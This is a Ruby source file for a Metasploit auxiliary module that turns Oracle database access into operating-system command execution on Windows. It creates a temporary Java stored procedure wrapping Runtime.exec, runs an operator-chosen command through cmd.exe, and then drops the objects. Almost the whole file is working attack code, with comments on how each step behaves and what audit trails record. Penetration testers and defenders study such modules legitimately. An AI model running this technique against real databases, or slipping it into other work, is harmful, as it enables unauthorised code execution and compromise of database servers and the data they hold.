
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
##
# Oracle Java execCommand (Win32).
#
# Creates a throw-away Java stored procedure that wraps
# Runtime.getRuntime().exec, calls it once with the CMD option through
# cmd.exe, and then drops both database objects again. Every step is a
# DDL statement or an anonymous PL/SQL block sent with prepare_exec, so a
# database audit trail covering CREATE/DROP JAVA SOURCE and CREATE/DROP
# PROCEDURE records a run of this module even though the objects only
# exist for the duration of that run.
##
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::ORACLE

  # Registers the module metadata and the single CMD datastore option.
  #
  # @param info [Hash] module info hash merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Java execCommand (Win32)',
      'Description'    => %q{
This module will create a java class which enables the execution of OS commands.
},
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'URL', 'https://www.metasploit.com/users/mc' ],
        ],
      'DisclosureDate' => 'Dec 7 2007'))

    register_options(
      [
        OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),
      ], self.class)
  end

  # Module entry point.
  #
  # Returns early when the Oracle client dependencies are missing. Only
  # the first statement (creating the Java source) is wrapped in a
  # rescue; a failure there ends the run without reporting the error,
  # while errors from the later statements propagate to the framework.
  def run
    return unless check_dependencies

    # Random upper-case names (1..10 chars) for the Java class and the
    # PL/SQL wrapper procedure.
    class_name = Rex::Text.rand_text_alpha_upper(rand(1..10))
    proc_name  = Rex::Text.rand_text_alpha_upper(rand(1..10))

    begin
      print_status("Creating java source '#{class_name}'...")
      prepare_exec(java_source_ddl(class_name))
    rescue StandardError
      # A failed CREATE JAVA SOURCE silently ends the run.
      return
    end

    print_status("Creating procedure '#{proc_name}'...")
    prepare_exec(procedure_ddl(proc_name, class_name))

    # CMD is interpolated verbatim into the PL/SQL string literal.
    print_status("Sending command: '#{datastore['CMD']}'")
    prepare_exec("begin #{proc_name}('cmd.exe /c #{datastore['CMD']}'); end;")

    print_status("Removing java source '#{class_name}'...")
    prepare_exec("drop java source #{class_name}")

    print_status("Removing procedure '#{proc_name}'...")
    prepare_exec("drop procedure #{proc_name}")
  end

  private

  # DDL creating a Java class whose static execCommand forwards its
  # argument to Runtime.exec. The text starts and ends with a newline.
  #
  # @param class_name [String] name of the Java source and class
  # @return [String] the CREATE JAVA SOURCE statement
  def java_source_ddl(class_name)
    "\n" + <<~JAVA
      create or replace and resolve java source named "#{class_name}" as
      import java.lang.*;
      import java.io.*;
      public class #{class_name}
      {
      public static void execCommand (String command) throws IOException
      {
      Runtime.getRuntime().exec(command);
      }
      };
    JAVA
  end

  # DDL creating the PL/SQL procedure bound to the Java method. The text
  # starts and ends with a newline.
  #
  # @param proc_name [String] name of the wrapper procedure
  # @param class_name [String] Java class that defines execCommand
  # @return [String] the CREATE PROCEDURE statement
  def procedure_ddl(proc_name, class_name)
    "\n" + <<~SQL
      create or replace procedure #{proc_name} (p_command in varchar2)
      as language java
      name '#{class_name}.execCommand (java.lang.String)';
    SQL
  end
end